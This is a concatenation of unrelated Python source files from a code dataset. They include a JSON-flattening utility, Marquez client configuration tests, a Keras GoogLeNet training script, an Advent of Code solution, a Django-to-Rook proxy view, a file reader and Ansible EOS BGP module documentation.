            if isinstance(data, (bytes, bytearray)):
                self.__json_text = bytes(data).decode('utf-8')
            else:
                self.__json_text = data
        elif isinstance(data, (dict, list, tuple)):
            self.__json = data
            self.__json_text = json.dumps(data)
        self.__struct = {}
        self.__count = {}

    def print(self):
        """Print the flattened per-level structure as a JSON string."""
        import json
        self.__init_load()
        print(json.dumps(self.__struct))

    def get(self, key, level: int = None):
        """Return the list of values stored under `key`.

        :param key: dictionary key to look up
        :param level: nesting level (0-based); None searches every level
        :return: list of all matching values (a key may occur several times)
        """
        self.__init_load()
        if BasicCheckUtil.is_none(level):
            result_list = []
            for level_key, value in self.__struct.items():
                if BasicCheckUtil.non_none(value.get(key)):
                    result_list += value[key]
            return result_list
        level_key = self.__level_prefix + str(level)
        return self.__struct[level_key][key]

    def get_first(self, key, level: int = None):
        """Return the first value stored under `key` (see get_one)."""
        return self.get_one(key, 0, level)

    def get_last(self, key, level: int = None):
        """Return the last value stored under `key` (see get_one)."""
        if BasicCheckUtil.is_none(level):
            total = 0
            for level_key, value in self.__count.items():
                if BasicCheckUtil.non_none(value.get(key)):
                    total += value[key]
            return self.get_one(key, total - 1, level)
        level_key = self.__level_prefix + str(level)
        return self.get_one(key, self.__count[level_key][key] - 1, level)

    def get_one(self, key, index=0, level: int = None):
        """Return the `index`-th (0-based) value stored under `key`.

        :raises IndexError: when fewer than index+1 values exist
        """
        self.__init_load()
        if BasicCheckUtil.is_none(level):
            result_list = []
            for level_key, value in self.__struct.items():
                if BasicCheckUtil.non_none(value.get(key)):
                    result_list += value[key]
            # The original had a redundant early-return guard before this same
            # index access; one access (raising IndexError if out of range)
            # is equivalent.
            return result_list[index]
        level_key = self.__level_prefix + str(level)
        return self.__struct[level_key][key][index]

    def get_original_json(self):
        """Return the originally supplied parsed object."""
        return self.__json

    def get_original_json_text(self):
        """Return the original JSON text."""
        return self.__json_text

    def __init_load(self):
        """Flatten the document once; later calls are no-ops."""
        if not self.__init_load_status:
            if self.__json is None:
                # The original *returned* the exception instead of raising it,
                # so callers never saw the error.
                raise ValueError('当前没有Json对象')
            self.__re_init_load(self.__json)
            self.__init_load_status = True

    def __re_init_load(self, param, level=0):
        """Recursively pull nested dict values up into per-level buckets."""
        level_key = self.__level_prefix + str(level)
        if BasicCheckUtil.is_none(self.__struct.get(level_key)):
            self.__struct[level_key] = {}
            self.__count[level_key] = {}
        if isinstance(param, dict):
            for key, value in param.items():
                count = self.__count[level_key].get(key)
                if count is None:
                    count = 0
                    self.__struct[level_key][key] = []
                self.__struct[level_key][key].insert(count, value)
                count += 1
                self.__count[level_key][key] = count
                self.__re_init_load(value, level + 1)
        elif isinstance(param, (list, tuple)):
            for single in param:
                self.__re_init_load(single, level + 1)
144463 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pytest
from marquez_client import MarquezClient
from marquez_client.constants import (
DEFAULT_HOST, DEFAULT_PORT, DEFAULT_TIMEOUT_MS, DEFAULT_NAMESPACE_NAME
)
from pytest import fixture
@fixture(scope='function')
def clear_env():
    """Wipe all environment variables so each test starts from a clean env."""
    os.environ.clear()
def test_host_default(clear_env):
    """With no env vars or args, the client targets DEFAULT_HOST on port 8080."""
    client = MarquezClient()
    assert client._api_base == f'http://{DEFAULT_HOST}:8080/api/v1'
def test_host_from_env(clear_env):
    """The MARQUEZ_HOST env var overrides the default host."""
    os.environ['MARQUEZ_HOST'] = 'marquez.dev'
    client = MarquezClient()
    # Plain literal: the original was an f-string with no placeholders (F541).
    assert client._api_base == 'http://marquez.dev:8080/api/v1'
def test_host_from_constructor(clear_env):
    """A host passed to the constructor wins over the MARQUEZ_HOST env var."""
    os.environ['MARQUEZ_HOST'] = 'marquez.dev'
    client = MarquezClient(host='marquez.staging')
    # Plain literal: the original was an f-string with no placeholders (F541).
    assert client._api_base == 'http://marquez.staging:8080/api/v1'
def test_port_default(clear_env):
    """With no overrides, the client uses DEFAULT_PORT."""
    client = MarquezClient()
    assert client._api_base == f'http://{DEFAULT_HOST}:{DEFAULT_PORT}/api/v1'
def test_port_from_env(clear_env):
    """The MARQUEZ_PORT env var overrides the default port."""
    os.environ['MARQUEZ_PORT'] = '5000'
    client = MarquezClient()
    assert client._api_base == f'http://{DEFAULT_HOST}:5000/api/v1'
def test_port_from_constructor(clear_env):
    """A port passed to the constructor wins over the MARQUEZ_PORT env var."""
    os.environ['MARQUEZ_PORT'] = '5000'
    client = MarquezClient(port=5001)
    assert client._api_base == f'http://{DEFAULT_HOST}:5001/api/v1'
def test_timeout_default(clear_env):
    """The default timeout is DEFAULT_TIMEOUT_MS converted to seconds."""
    client = MarquezClient()
    assert client._timeout == DEFAULT_TIMEOUT_MS / 1000.0
def test_timeout_from_env(clear_env):
    """MARQUEZ_TIMEOUT_MS (milliseconds) is read from the env and converted to seconds."""
    os.environ['MARQUEZ_TIMEOUT_MS'] = '2000'
    client = MarquezClient()
    assert client._timeout == 2.0
def test_timeout_from_constructor(clear_env):
    """A timeout passed to the constructor wins over MARQUEZ_TIMEOUT_MS."""
    os.environ['MARQUEZ_TIMEOUT_MS'] = '2000'
    client = MarquezClient(timeout_ms=3500)
    assert client._timeout == 3.5
def test_namespace_default(clear_env):
    """With no overrides, the client uses DEFAULT_NAMESPACE_NAME."""
    client = MarquezClient()
    assert client.namespace == DEFAULT_NAMESPACE_NAME
def test_namespace_from_env(clear_env):
    """The MARQUEZ_NAMESPACE env var overrides the default namespace."""
    os.environ['MARQUEZ_NAMESPACE'] = 'from_env'
    client = MarquezClient()
    assert client.namespace == 'from_env'
    # TODO: https://github.com/MarquezProject/marquez-python/issues/59
    os.environ.clear()
def test_namespace_from_constructor(clear_env):
    """A namespace passed to the constructor wins over MARQUEZ_NAMESPACE."""
    os.environ['MARQUEZ_NAMESPACE'] = 'from_env'
    client = MarquezClient(namespace_name='from_constructor')
    assert client.namespace == 'from_constructor'
    # TODO: https://github.com/MarquezProject/marquez-python/issues/59
    os.environ.clear()
| StarcoderdataPython |
103772 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import division
import os
import numpy as np
from os.path import isfile, join
from os import listdir
import sys
sys.path.append('../')
from types import SimpleNamespace as Namespace
# from SimpleNamespace import SimpleNamespace as Namespace
import random
import os.path
from sklearn.cross_validation import train_test_split
from keras.models import Sequential
from keras.callbacks import ReduceLROnPlateau
import keras.utils.np_utils as kutils
import random
import matplotlib.pyplot as plt
from keras import backend as K
from keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D
from keras.optimizers import RMSprop
from keras.preprocessing.image import ImageDataGenerator
from util.Util import Util
from scipy.misc import imread, imresize
from keras.layers import Input, Dense, Convolution2D, MaxPooling2D, AveragePooling2D, ZeroPadding2D, Dropout, Flatten, merge, Reshape, Activation
from keras.models import Model
from keras.regularizers import l2
from keras.optimizers import SGD
sys.path.append('../')
# --- experiment configuration -------------------------------------------------
classificationNum = 3  # NOTE(review): apparently unused below; the labels dict collapses to 2 classes
rootDir = '../../'  # repository root relative to this script's working directory
path = rootDir + Util.getConfig('trials_folder_path')  # raw trial recordings
tmpPath = rootDir + Util.getConfig('tmp_path')  # scratch directory
savePath = rootDir + Util.getConfig('pic_to_np_array')  # per-trial frame arrays (np.load'able)
width = 80  # original frame width in pixels -- assumed from config; TODO confirm
height = 60  # original frame height in pixels -- assumed from config; TODO confirm
# Binary label per trial file: 0 or 1.  Keys carry a '.json' suffix even though
# the arrays on disk do not; the loading loops below rebuild the key via
# file_name.split('.')[0] + '.json'.
labels = {'1a.json':0,
          '1b.json':0,
          '1c.json':0,
          '1d.json':0,
          '1e.json':0,
          '2a.json':0,
          '2b.json':1,
          '3a.json':0,
          '3b.json':1,
          '3c.json':1,
          '3d.json':1,
          '3e.json':1,
          '3f.json':1,
          '3g.json':1,
          '4a.json':0,
          '4b.json':1,
          '4c.json':1,
          '4d.json':1,
          '4e.json':1,
          '4f.json':1,
          '4g.json':1,
          '4h.json':0}
# Split trials into train/test at the *file* level so frames from one trial
# never land in both sets.
fileNames = [f for f in listdir(savePath) if isfile(join(savePath, f))]
# NOTE(review): 17 is a hard-coded train-set size (the labels dict has 22
# entries); random.sample raises ValueError if fewer than 17 files exist.
train_file_names = random.sample(fileNames,17)
test_file_names = [x for x in fileNames if x not in train_file_names]
def _load_split(file_names):
    """Load and stack the frame arrays and one-hot labels for a list of trial files.

    Each file is a numpy archive whose ``'data'`` entry holds the frames of one
    trial; every frame inherits that trial's binary label from the module-level
    ``labels`` dict (keyed by ``<stem>.json``).

    Returns a ``(data, labels)`` pair of vertically stacked arrays, or
    ``(None, None)`` when ``file_names`` is empty.
    """
    data_total = None
    label_total = None
    for file_name in file_names:
        archive = np.load(savePath + file_name)
        frames = archive['data']
        # Trial-level label -> one-hot row.
        if labels[file_name.split('.')[0] + '.json'] == 0:
            one_hot = np.array([1, 0])
        else:
            one_hot = np.array([0, 1])
        # One label row per frame; np.repeat replaces the old per-row
        # np.vstack loop, which was quadratic in the number of frames.
        frame_labels = np.repeat(one_hot[np.newaxis, :], frames.shape[0], axis=0)
        data_total = frames if data_total is None else np.vstack((data_total, frames))
        label_total = frame_labels if label_total is None else np.vstack((label_total, frame_labels))
    return data_total, label_total


# The train and test loops were previously two near-identical copies of the
# same logic; both now go through _load_split.
train_data_total, train_label_total = _load_split(train_file_names)
test_data_total, test_label_total = _load_split(test_file_names)
# --- assemble shuffled train/validation tensors -------------------------------
epochs = 30
batch_size = 80
img_height, img_width = 64, 48  # network input size (differs from the 80x60 capture size above)
train_feature = train_data_total
test_feature = test_data_total
train_label = train_label_total
test_label = test_label_total
# Pair each frame with its label so that shuffling keeps them aligned.
# Kept as explicit loops + shuffle calls: the order of the random.shuffle
# calls determines reproducibility for a fixed seed, so statements are not
# reordered here.
corrLabel = list()
corrLabel_test = list()
for i in range(train_feature.shape[0]):
    corrLabel.append((train_feature[i,:], train_label[i,:]))
for i in range(test_feature.shape[0]):
    corrLabel_test.append((test_feature[i,:], test_label[i,:]))
random.shuffle(corrLabel)
random.shuffle(corrLabel_test)
# Unzip back into feature/label arrays; features become single-channel
# (width, height, 1) images, labels stay one-hot pairs.
trainX= np.array([i[0] for i in corrLabel]).reshape(-1,img_width, img_height,1)
valX = np.array([i[0] for i in corrLabel_test]).reshape(-1,img_width, img_height,1)
trainY = np.array([i[1] for i in corrLabel]).reshape(-1, 2)
valY = np.array([i[1] for i in corrLabel_test]).reshape(-1, 2)
# trainX, valX, trainY, valY = train_test_split(trainX, trainY, test_size=0.3)
print(trainX.shape, valX.shape, trainY.shape, valY.shape)
# input_shape = (img_width, img_height, 1)
# input_shape = Input(shape=(3, img_width, img_height))
# input = Input(shape=(1, img_width, img_height))
# ---------------------------------------------------------------------------
# GoogLeNet (Inception v1) built with the Keras 1.x functional API.
#
# Fixes over the previous revision:
#   * the Input tensor is bound to a name (`inp`); previously it was created
#     inline and Model(input=input, ...) referenced the *builtin* `input`
#     function, which fails at model-construction time.
#   * the undefined `PoolHelper()` call before pool4 (a NameError) is dropped,
#     matching the commented-out PoolHelper usage at pool1/pool2/pool3.
#   * the nine copy-pasted inception blocks are generated by one helper; the
#     layer previously misnamed 'inception_4b_output' is now the consistent
#     'inception_4b/output'.
#
# NOTE(review): the input shape (3, img_width, img_height) is channels-first
# while trainX is reshaped to (-1, img_width, img_height, 1); one of the two
# must be wrong for the configured backend dim-ordering -- confirm before
# training.

def _inception(x, name, n1x1, n3x3_reduce, n3x3, n5x5_reduce, n5x5, n_pool_proj):
    """Build one Inception module (1x1 / 3x3 / 5x5 / pool-proj branches) on x."""
    reg = l2(0.0002)
    branch_1x1 = Convolution2D(n1x1, 1, 1, border_mode='same', activation='relu',
                               name=name + '/1x1', W_regularizer=reg)(x)
    reduce_3x3 = Convolution2D(n3x3_reduce, 1, 1, border_mode='same', activation='relu',
                               name=name + '/3x3_reduce', W_regularizer=reg)(x)
    branch_3x3 = Convolution2D(n3x3, 3, 3, border_mode='same', activation='relu',
                               name=name + '/3x3', W_regularizer=reg)(reduce_3x3)
    reduce_5x5 = Convolution2D(n5x5_reduce, 1, 1, border_mode='same', activation='relu',
                               name=name + '/5x5_reduce', W_regularizer=reg)(x)
    branch_5x5 = Convolution2D(n5x5, 5, 5, border_mode='same', activation='relu',
                               name=name + '/5x5', W_regularizer=reg)(reduce_5x5)
    pool = MaxPooling2D(pool_size=(3, 3), strides=(1, 1), border_mode='same',
                        name=name + '/pool')(x)
    pool_proj = Convolution2D(n_pool_proj, 1, 1, border_mode='same', activation='relu',
                              name=name + '/pool_proj', W_regularizer=reg)(pool)
    # concat_axis=1 assumes channels-first ordering (see NOTE above).
    return merge([branch_1x1, branch_3x3, branch_5x5, pool_proj],
                 mode='concat', concat_axis=1, name=name + '/output')


def _downsample(x, name):
    """Zero-pad then 3x3/stride-2 max-pool, as between the inception stages."""
    padded = ZeroPadding2D(padding=(1, 1))(x)
    return MaxPooling2D(pool_size=(3, 3), strides=(2, 2), border_mode='valid',
                        name=name)(padded)


def _aux_head(x, prefix):
    """Auxiliary softmax classifier head (GoogLeNet loss1/loss2)."""
    reg = l2(0.0002)
    pooled = AveragePooling2D(pool_size=(5, 5), strides=(3, 3),
                              name=prefix + '/ave_pool')(x)
    conv = Convolution2D(128, 1, 1, border_mode='same', activation='relu',
                         name=prefix + '/conv', W_regularizer=reg)(pooled)
    fc = Dense(1024, activation='relu', name=prefix + '/fc',
               W_regularizer=reg)(Flatten()(conv))
    logits = Dense(1000, name=prefix + '/classifier',
                   W_regularizer=reg)(Dropout(0.7)(fc))
    return Activation('softmax')(logits)


inp = Input(shape=(3, img_width, img_height))

# Stem: 7x7/2 conv -> pool -> 1x1 reduce -> 3x3 conv -> pool.
conv1 = Convolution2D(64, 7, 7, subsample=(2, 2), border_mode='same', activation='relu',
                      name='conv1/7x7_s2', W_regularizer=l2(0.0002))(inp)
pool1 = _downsample(conv1, 'pool1/3x3_s2')
conv2_reduce = Convolution2D(64, 1, 1, border_mode='same', activation='relu',
                             name='conv2/3x3_reduce', W_regularizer=l2(0.0002))(pool1)
conv2 = Convolution2D(192, 3, 3, border_mode='same', activation='relu',
                      name='conv2/3x3', W_regularizer=l2(0.0002))(conv2_reduce)
pool2 = _downsample(conv2, 'pool2/3x3_s2')

# Inception stages; filter counts follow the original GoogLeNet table.
x = _inception(pool2, 'inception_3a', 64, 96, 128, 16, 32, 32)
x = _inception(x, 'inception_3b', 128, 128, 192, 32, 96, 64)
x = _downsample(x, 'pool3/3x3_s2')
x = _inception(x, 'inception_4a', 192, 96, 208, 16, 48, 64)
aux1 = _aux_head(x, 'loss1')          # first auxiliary classifier
x = _inception(x, 'inception_4b', 160, 112, 224, 24, 64, 64)
x = _inception(x, 'inception_4c', 128, 128, 256, 24, 64, 64)
x = _inception(x, 'inception_4d', 112, 144, 288, 32, 64, 64)
aux2 = _aux_head(x, 'loss2')          # second auxiliary classifier
x = _inception(x, 'inception_4e', 256, 160, 320, 32, 128, 128)
x = _downsample(x, 'pool4/3x3_s2')
x = _inception(x, 'inception_5a', 256, 160, 320, 32, 128, 128)
x = _inception(x, 'inception_5b', 384, 192, 384, 48, 128, 128)

# Main head: global 7x7 average pool -> dropout -> 1000-way softmax.
pool5 = AveragePooling2D(pool_size=(7, 7), strides=(1, 1), name='pool5/7x7_s2')(x)
main_logits = Dense(1000, name='loss3/classifier',
                    W_regularizer=l2(0.0002))(Dropout(0.4)(Flatten()(pool5)))
main_out = Activation('softmax', name='prob')(main_logits)

googlenet = Model(input=inp, output=[aux1, aux2, main_out])
model = googlenet
sgd = SGD(lr=0.1, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='categorical_crossentropy')
# Halve the learning rate after 3 epochs without val_acc improvement.
learning_rate_reduction = ReduceLROnPlateau(monitor='val_acc',
                                            patience=3,
                                            verbose=1,
                                            factor=0.5,
                                            min_lr=0.00001)
# Light augmentation only: small rotations / zooms / shifts; all
# normalization, whitening and flipping options are explicitly disabled.
datagen = ImageDataGenerator(
        featurewise_center=False,  # set input mean to 0 over the dataset
        samplewise_center=False,  # set each sample mean to 0
        featurewise_std_normalization=False,  # divide inputs by std of the dataset
        samplewise_std_normalization=False,  # divide each input by its std
        zca_whitening=False,  # apply ZCA whitening
        rotation_range=10,  # randomly rotate images in the range (degrees, 0 to 180)
        zoom_range = 0.1,  # Randomly zoom image
        width_shift_range=0.1,  # randomly shift images horizontally (fraction of total width)
        height_shift_range=0.1,  # randomly shift images vertically (fraction of total height)
        horizontal_flip=False,  # randomly flip images
        vertical_flip=False)  # randomly flip images
datagen.fit(trainX)
# NOTE(review): the model compiled above has three outputs, but trainY/valY is
# a single (N, 2) array and each classifier head is 1000-way -- Keras will
# reject this at fit time; confirm which head/width is actually intended.
history = model.fit_generator(datagen.flow(trainX,trainY, batch_size=batch_size),
                              epochs = epochs, validation_data = (valX,valY),
                              verbose = 2, steps_per_epoch=trainX.shape[0] // batch_size
                              , callbacks=[learning_rate_reduction])
# Plot the loss and accuracy curves for training and validation.
fig, ax = plt.subplots(2,1)
ax[0].plot(history.history['loss'], color='b', label="Training loss")
ax[0].plot(history.history['val_loss'], color='r', label="validation loss",axes =ax[0])
legend = ax[0].legend(loc='best', shadow=True)
# NOTE(review): 'acc'/'val_acc' are only present if an accuracy metric was
# passed to compile(); none is passed above -- confirm these keys exist.
ax[1].plot(history.history['acc'], color='b', label="Training accuracy")
ax[1].plot(history.history['val_acc'], color='r',label="Validation accuracy")
legend = ax[1].legend(loc='best', shadow=True)
# plt.show()
# ---------------------------------------------------------------------------
# Evaluation: collapse one-hot rows to class indices and print a report.
from sklearn.metrics import classification_report

y_true = valY
# NOTE(review): with three model outputs, predict() returns a *list* of
# arrays; the argmax below assumes a single (N, 2) array -- confirm which
# head should be scored.
y_pred = model.predict(valX)
print(y_pred)
# argmax over the two class columns replaces the previous manual
# element-by-element comparison loops.
y_pred_list = list(np.argmax(y_pred, axis=1))
y_true_list = list(np.argmax(y_true, axis=1))
target_names = ['0', '1']
print(classification_report(y_true_list, y_pred_list, target_names=target_names))
model.save('my_model4.h5')
| StarcoderdataPython |
830 | <gh_stars>1-10
def getNumBags(color):
    """Recursively count *color* itself plus every bag nested inside it.

    Relies on the module-level ``rules`` mapping of
    color -> list of (inner_color, count) pairs.  The empty-string color is
    the sentinel produced for "no other bags" and contributes nothing.
    """
    if color == '':
        return 0
    return 1 + sum(count * getNumBags(inner) for inner, count in rules[color])
# Parse the puzzle input into: rule color -> [(inner color, count), ...].
# Stripping " bags"/" bag" and '.' leaves lines like
# "light red contain 1 bright white, 2 muted yellow"; "no other" becomes a
# count of 0 with an empty color, which getNumBags treats as the base case.
with open('day7/input.txt') as f:
    rules=dict([l.split(' contain') for l in f.read().replace(' bags', '').replace(' bag', '').replace('.', '').replace(' no other', '0 ').splitlines()])
for key in rules:
    # NOTE(review): d[:2] assumes every count is at most two digits -- holds
    # for typical AoC day-7 inputs, but worth confirming before reuse.
    rules[key]=[(d[2:].strip(), int(d[:2].strip())) for d in rules[key].split(', ')]
print(getNumBags('shiny gold')-1)  # -1 because the shiny gold bag itself is not counted
3240413 | <filename>tworaven_apps/rook_services/views.py
import requests
import json
from requests.exceptions import ConnectionError
from django.http import JsonResponse, HttpResponse, Http404
from django.views.decorators.csrf import csrf_exempt
from tworaven_apps.call_captures.models import ServiceCallEntry
from tworaven_apps.rook_services.rook_app_info import RookAppInfo
from tworaven_apps.rook_services.models import UI_KEY_SOLA_JSON, ROOK_ZESSIONID
from tworaven_apps.workspaces.workspace_util import WorkspaceUtil
from tworaven_apps.utils.view_helper import get_session_key
from tworaven_apps.utils.view_helper import get_request_body,\
get_request_body_as_json
@csrf_exempt
def view_rook_route(request, app_name_in_url):
    """Route TwoRavens calls to Rook.

    orig: TwoRavens -> Rook
    view: TwoRavens -> Django 2ravens -> Rook

    Looks up the rook app named in the URL, extracts the solaJSON payload
    from the request, injects the Django session key wherever the payload
    carries a blank ROOK_ZESSIONID, forwards the payload to the R server,
    and relays the R server's response body back to the caller.  Failures
    are returned as JSON error documents; unknown app names raise Http404.
    """
    # get the app info
    rook_app_info = RookAppInfo.get_appinfo_from_url(app_name_in_url)
    if rook_app_info is None:
        raise Http404(('unknown rook app: "{0}" (please add "{0}" to '
                       ' "tworaven_apps/rook_services/app_names.py")').format(\
                       app_name_in_url))

    # record session metadata, if appropriate
    WorkspaceUtil.record_state(request)

    # look for the "solaJSON" variable in the POST
    if rook_app_info.is_health_check():
        # this is a health check; no payload required
        raven_data_text = 'healthcheck'
    elif request.POST and UI_KEY_SOLA_JSON in request.POST:
        # this is a POST with a JSON string under the solaJSON key
        raven_data_text = request.POST[UI_KEY_SOLA_JSON]
    else:
        # See if the body itself is JSON
        req_found, raven_data_text = get_request_body_as_json(request)
        if not req_found:  # Nope, send an error
            err_msg = ("Neither key '%s' found in POST"
                       " nor JSON in request.body") % UI_KEY_SOLA_JSON
            return JsonResponse(dict(status="ERROR",
                                     message=err_msg))

    # Insert the django session id into the payload if it has a blank one.
    session_key = get_session_key(request)

    if isinstance(raven_data_text, str):
        # Payload is raw text: plain string substitution is cheaper than a
        # JSON parse/serialize round trip.
        blank_session_str = '%s":""' % ROOK_ZESSIONID
        if raven_data_text.find(blank_session_str) > -1:
            updated_session_str = '%s":"%s"' % (ROOK_ZESSIONID, session_key)
            raven_data_text = raven_data_text.replace(blank_session_str,
                                                      updated_session_str)
    elif ROOK_ZESSIONID in raven_data_text:
        # Payload was parsed into a dict by get_request_body_as_json
        if raven_data_text[ROOK_ZESSIONID] in [None, '']:
            raven_data_text[ROOK_ZESSIONID] = session_key

    if not isinstance(raven_data_text, str):
        try:
            raven_data_text = json.dumps(raven_data_text)
        except TypeError:
            # BUG FIX: this JsonResponse was previously constructed but never
            # *returned*, so the error was silently discarded and the
            # un-serialized payload fell through to the R call below.
            return JsonResponse(dict(success=False,
                                     message='Failed to convert data to JSON'))

    app_data = dict(solaJSON=raven_data_text)
    rook_svc_url = rook_app_info.get_rook_server_url()

    # Begin object to capture the outgoing request, if recording is on
    call_entry = None
    if rook_app_info.record_this_call():
        call_entry = ServiceCallEntry.get_rook_entry(\
                        request_obj=request,
                        call_type=rook_app_info.name,
                        outgoing_url=rook_svc_url,
                        request_msg=raven_data_text)

    # Call R services
    try:
        rservice_req = requests.post(rook_svc_url,
                                     data=app_data)
    except ConnectionError:
        err_msg = 'R Server not responding: %s' % rook_svc_url
        if rook_app_info.record_this_call():
            call_entry.add_error_message(err_msg)
            call_entry.save()
        return JsonResponse(dict(message=err_msg))

    # Save the request result
    if rook_app_info.record_this_call():
        if rservice_req.status_code == 200:
            call_entry.add_success_message(rservice_req.text,
                                           rservice_req.status_code)
        else:
            call_entry.add_error_message(rservice_req.text,
                                         rservice_req.status_code)
        call_entry.save()

    # Relay the R server's raw response body to the caller
    print('status code from rook call: %d' % rservice_req.status_code)
    return HttpResponse(rservice_req.text)
NUM_CLICKS_KEY = 'NUM_CLICKS_KEY'  # NOTE(review): not referenced in the visible code -- confirm before removing
@csrf_exempt
def view_rp_test(request):
    """Trivial liveness endpoint: always answers with a fixed JSON payload."""
    payload = {'name': 'test url', 'status_code': 1}
    return JsonResponse(payload)
# example of incoming POST from TwoRavens
"""
<QueryDict: {'solaJSON': ['{"zdata":"fearonLaitinData.tab","zedges":[["country","ccode"],["ccode","cname"]],"ztime":[],"znom":["country"],"zcross":[],"zmodel":"","zvars":["ccode","country","cname"],"zdv":["cname"],"zdataurl":"","zsubset":[["",""],[],[]],"zsetx":[["",""],["",""],["",""]],"zmodelcount":0,"zplot":[],"zsessionid":"","zdatacite":"Dataverse, Admin, 2015, \\"Smoke test\\", http://dx.doi.org/10.5072/FK2/WNCZ16, Root Dataverse, V1 [UNF:6:iuFERYJSwTaovVDvwBwsxQ==]","zmetadataurl":"http://127.0.0.1:8080/static/data/fearonLaitin.xml","zusername":"rohit","callHistory":[],"allVars":["durest","aim","casename","ended","ethwar","waryrs","pop","lpop","polity2","gdpen","gdptype","gdpenl","lgdpenl1","lpopl1","region"]}']}>
"""
"""
try:
# try to convert text to JSON
#
raven_data_json = json.loads(request.POST['solaJSON'])
# Doublecheck that the ROOK_ZESSIONID is blank
#
if raven_data_json.get(ROOK_ZESSIONID, None) == '':
#print('blank session id....')
# blank id found, subsitute the django session key
#
raven_data_json[ROOK_ZESSIONID] = session_key
#
#
raven_data_text = json.dumps(raven_data_json)
"""
| StarcoderdataPython |
3225726 | <filename>src/app/read_text_files.py
import os
import sys
def get_path_to_input_files():
    """Return absolute path of the 'app/files' folder under the working dir.

    Exits the program when the folder does not exist.

    BUG FIX: the previous version wrapped ``os.getcwd()`` in a
    try/except FileNotFoundError, but getcwd() never raises that for a
    missing *target* folder, so the error branch was dead code and a missing
    folder went undetected until a later open() failed.
    """
    path = os.getcwd() + "/app/files"  # relative path expected to contain input files
    if not os.path.isdir(path):
        print("Folder named 'files' not found.")
        sys.exit()
    return path
def read_file(file_path, split_on, drop_list=None):
    """Read *file_path* line by line, split each line on *split_on*, and first
    delete every substring listed in *drop_list* (optional, defaults to None).

    Reading stops at the first blank (or whitespace-only) line.
    NOTE(review): that early stop means content after an interior blank line
    is silently ignored -- confirm input files never contain blank lines.

    Returns a list of lists with the extracted fields; exits the program when
    the file is missing.
    """
    content = []  # extracted rows, one list of fields per input line
    try:
        file = open(file_path)
    except FileNotFoundError:
        print(f"File named '{file_path}' not found.")
        sys.exit()
    # BUG FIX: the handle previously leaked if splitting/replacing raised;
    # the context manager guarantees it is closed on every path.
    with file:
        while (line := file.readline().rstrip()):
            if drop_list is not None:
                for drop in drop_list:
                    line = line.replace(drop, "")
            content.append(line.split(split_on))
    return content
140585 | <reponame>Stienvdh/statrick<filename>intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/arista/eos/plugins/modules/eos_bgp_global.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2020 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#############################################
# WARNING #
#############################################
#
# This file is auto generated by the resource
# module builder playbook.
#
# Do not edit this file manually.
#
# Changes to this file will be over written
# by the resource module builder.
#
# Changes should be made in the model used to
# generate this file or in the resource module
# builder template.
#
#############################################
"""
The module file for eos_bgp_global
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
module: eos_bgp_global
short_description: Manages BGP global resource module
description: This module configures and manages the attributes of BGP global on Arista
EOS platforms.
version_added: 1.4.0
author: <NAME> (@GomathiselviS)
notes:
- Tested against Arista EOS 4.23.0F
- This module works with connection C(network_cli). See the L(EOS Platform Options,eos_platform_options).
options:
config:
description: A list of configurations for BGP global.
type: dict
suboptions:
as_number:
description: Autonomous system number.
type: str
aggregate_address:
description: Configure aggregate address.
type: list
elements: dict
suboptions:
address:
description: ipv4/ipv6 address prefix.
type: str
advertise_only:
description: Advertise without installing the generated blackhole route in
FIB.
type: bool
as_set:
description: Generate autonomous system set path information.
type: bool
attribute_map:
description: Name of the route map used to set the attribute of the
aggregate route.
type: str
match_map:
description: Name of the route map used to filter the contributors of the
aggregate route.
type: str
summary_only:
description: Filters all more-specific routes from updates.
type: bool
bgp_params:
description: BGP parameters.
type: dict
suboptions:
additional_paths:
description: BGP additional-paths commands
type: str
choices: ['install', 'send', 'receive']
advertise_inactive:
description: Advertise BGP routes even if they are inactive in RIB.
type: bool
allowas_in:
description: Allow local-as in updates.
type: dict
suboptions:
set:
description: When True, it is set.
type: bool
count:
description: Number of local ASNs allowed in a BGP update.
type: int
always_compare_med:
description: BGP Always Compare MED
type: bool
asn:
description: AS Number notation.
type: str
choices: ['asdot', 'asplain']
auto_local_addr:
description: Automatically determine the local address to be used
for the non-transport AF.
type: bool
bestpath:
description: Select the bestpath selection algorithim for BGP routes.
type: dict
suboptions:
as_path:
description: Select the bestpath selection based on as-path.
type: str
choices: ['ignore', 'multipath_relax']
ecmp_fast:
description: Tie-break BGP paths in a ECMP group based on the order of arrival.
type: bool
med:
description: MED attribute
type: dict
suboptions:
confed:
description: MED Confed.
type: bool
missing_as_worst:
description: MED missing-as-worst.
type: bool
skip:
description: skip one of the tie breaking rules in the bestpath selection.
type: bool
tie_break:
description: Configure the tie-break option for BGP bestpath selection.
choices: ['cluster_list_length', 'router_id']
type: str
client_to_client:
description: client to client configuration.
type: bool
cluster_id:
description: Cluster ID of this router acting as a route reflector.
type: str
confederation:
description: confederation.
type: dict
suboptions:
identifier:
description: Confederation identifier.
type: str
peers:
description: Confederation peers.
type: str
control_plan_filter:
description: Control plane filter for BGP.
type: bool
convergence:
description: Bgp convergence parameters.
type: dict
suboptions:
slow_peer:
description: Maximum amount of time to wait for slow peers to estabilsh session.
type: bool
time:
description: time in secs
type: int
default:
description: Default neighbor configuration commands.
type: str
choices: ['ipv4_unicast', 'ipv6_unicast']
enforce_first_as:
description: Enforce the First AS for EBGP routes(default).
type: bool
host_routes:
description: BGP host routes configuration.
type: bool
labeled_unicast:
description: Labeled Unicast.
type: str
choices: ['ip', 'tunnel']
listen:
description: BGP listen.
type: dict
suboptions:
limit:
description: Set limit on the number of dynamic BGP peers allowed.
type: int
range:
description: Subnet Range to be associated with the peer-group.
type: dict
suboptions:
address:
description: Address prefix
type: str
peer_group:
description: Name of peer group.
type: dict
suboptions:
name:
description: name.
type: str
peer_filter:
description: Name of peer filter.
type: str
remote_as:
